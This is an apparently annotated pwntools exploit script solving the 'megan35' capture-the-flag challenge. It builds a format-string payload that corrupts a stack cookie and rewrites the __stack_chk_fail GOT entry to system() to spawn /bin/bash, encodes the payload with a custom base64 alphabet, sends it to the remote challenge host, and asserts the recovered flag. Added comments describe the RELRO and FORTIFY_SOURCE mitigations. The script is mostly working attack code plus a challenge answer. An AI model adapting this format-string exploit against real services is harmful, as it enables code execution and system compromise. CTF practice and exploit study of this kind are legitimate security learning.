
Untitled

a guest
Aug 11th, 2017
  1. #!/usr/bin/python
  2. import base64
  3. import sys
  4. from pwn import *
  5.  
  6. # MEGAN35 DECODER, GOTO LINE 44
# Four 65-character substitution alphabets for base64 variants. Each string
# lists, position by position, the replacement for the standard alphabet
# A-Z, a-z, 0-9, '+', '/', '=' (see B64VariantEncoder.__init__, which zips the
# two). Only megan35 is used by this script; the other three are unused here.
megan35 = "3GHIJKLMNOPQRSTUb=cdefghijklmnopWXYZ/12+406789VaqrstuvwxyzABCDEF5"
atom128 = "/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC"
zong22 = "ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2"
hazz15 = "HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5"
# Standard base64 alphabet plus the pad character. NOTE(review): nothing below
# reads this module-level name; B64VariantEncoder.__init__ shadows it with an
# identical local string.
base = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
  12.  
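class B64VariantEncoder:
    """Base64 codec whose output alphabet is swapped for a custom one.

    ``translation`` is a 65-character string giving, position by position,
    the replacement for each character of the standard alphabet
    ``A-Z a-z 0-9 + / =``. This is a pure alphabet substitution on top of
    base64 — an encoding, not encryption: anyone holding the alphabet
    (or able to recover it from samples) can reverse it.

    Attributes:
        lookup: standard character -> variant character.
        revlookup: variant character -> standard character.
    """

    _BASE = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="

    def __init__(self, translation):
        # zip() stops at the shorter string, so a translation shorter than
        # 65 characters leaves some standard characters unmapped and they
        # surface later as KeyError from encode()/decode().
        self.lookup = dict(zip(self._BASE, translation))
        self.revlookup = dict(zip(translation, self._BASE))

    def encode(self, text):
        """Base64-encode ``text`` and transliterate it into the variant alphabet.

        Args:
            text: bytes, or a str which is treated as latin-1 so that each
                character maps to exactly one byte (the Python 2 str
                semantics the original script relied on).

        Returns:
            str in the variant alphabet. The original iterated the raw
            b64encode() result, which only works on Python 2 where it is a
            str; here it is decoded to ASCII first so both interpreters agree.
        """
        raw = text if isinstance(text, bytes) else text.encode("latin-1")
        b64 = base64.b64encode(raw).decode("ascii")
        return "".join(self.lookup[ch] for ch in b64)

    def decode(self, code):
        """Map ``code`` back to the standard alphabet and base64-decode it.

        Args:
            code: str (or bytes, read as latin-1) in the variant alphabet.

        Returns:
            The decoded payload as bytes.

        Raises:
            KeyError: a character of ``code`` is not in the variant alphabet.
            binascii.Error (a ValueError; TypeError on Python 2): the
                translated text is not valid base64, e.g. bad padding.
        """
        if isinstance(code, bytes) and not isinstance(code, str):
            code = code.decode("latin-1")
        b64 = "".join(self.revlookup[ch] for ch in code)
        return base64.b64decode(b64)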
  30.  
def encode(variant, text):
    """Base64-encode ``text`` and transliterate it into the ``variant`` alphabet.

    ``variant`` is a 65-character alphabet ordered like the standard base64
    alphabet (A-Z, a-z, 0-9, +, /, =). Thin convenience wrapper: all the work
    is done by a throwaway B64VariantEncoder.
    """
    return B64VariantEncoder(variant).encode(text)
  34.  
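def decode(variant, code):
    """Translate ``code`` out of the ``variant`` alphabet and base64-decode it.

    Returns the decoded payload, or one of two sentinel strings on failure:
    ``"no valid encoding"`` when ``code`` holds a character outside
    ``variant``, and ``"no correct padding"`` when the translated text is not
    valid base64. Callers must compare against these strings; no exception
    escapes for these two cases.
    """
    try:
        return B64VariantEncoder(variant).decode(code)
    except KeyError:
        # revlookup has no entry for a character of `code`.
        return "no valid encoding"
    except (TypeError, ValueError):
        # Python 2's base64 raises TypeError on bad padding; Python 3 raises
        # binascii.Error, a ValueError subclass. The original caught only
        # TypeError, so on Python 3 a padding error escaped instead of
        # producing the sentinel.
        return "no correct padding"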
  43.  
# Basic idea of attack, corrupt stack cookie, overwrite __stack_check_fail in GOT
#
# Python 2 only: p32() yields a byte string that is concatenated with str
# literals below, which raises TypeError on Python 3.
#
# All three addresses are fixed for a single session against the remote
# service: the cookie location comes from a leaked stack pointer, the GOT slot
# is fixed by the (32-bit, per p32 and the 0x0804xxxx address) binary, and
# TARGET is hard-coded, so a known libc base is assumed rather than leaked
# here. NOTE(review): that the GOT slot is writable at all implies the binary
# was linked without full RELRO — inferred from the attack working, confirm
# with checksec. Linking with -Wl,-z,relro,-z,now makes the GOT read-only and
# this overwrite would fault instead.
STACK_COOKIE = 0xffffddd0-52 # leaked stack address, found offset to cookie
FAIL_GOT=0x804A018
TARGET=0xf7e38940 # target address of system in libc, accounted for 0x1b000 page offset

# overwrite both GOT address and stack cookie using %(h){1-2}n printf
# The five p32() values go first so they sit at positional format arguments
# 71-75 (the numbers in the trailing comments); the %N$n / %N$hhn specifiers
# that follow write through them. The primitive exists only because the
# service evidently uses received text as a printf format string: a constant
# format string removes it entirely, -Wformat-security flags it at compile
# time, and -D_FORTIFY_SOURCE=2 aborts on %n in a non-constant format.
payload=p32(STACK_COOKIE) # 71
payload+=p32(FAIL_GOT)    # 72
payload+=p32(FAIL_GOT+1)  # 73
payload+=p32(FAIL_GOT+2)  # 74
payload+=p32(FAIL_GOT+3)  # 75
payload+="%71$n" # corrupt cookie
payload+="%37x"
payload+="%73$hhn"
payload+="       "
payload+="%72$hhn"
payload+="%165x"
payload+="%74$hhn"
payload+="%18x" # overwrite got address
payload+="%75$hhn;/bin/bash" # run /bin/bash

# some debug output
log.warn("Stack cookie at {0}".format(hex(STACK_COOKIE)))

# megan35 encode the payload
# The raw payload contains non-printable address bytes; presumably the service
# expects megan35-alphabet input, so it is transliterated before being sent.
sendit = encode(megan35, payload)

#send ittttttttttttt
p = remote("megan35.stillhackinganyway.nl", 3535)
p.sendline(sendit)
p.recv(1024) # payload output
p.recv(1024) # shell error
p.sendline("\n\ncat flag")
flag = p.recv(1024)

# Each recv() reads at most 1024 bytes with no framing or timeout handling, so
# the check below only passes if the flag arrives within that single read.
assert ("flag{43eb404b714b8d22e1168775eba1669c}" in flag)
log.info("{0}".format(flag))

p.close()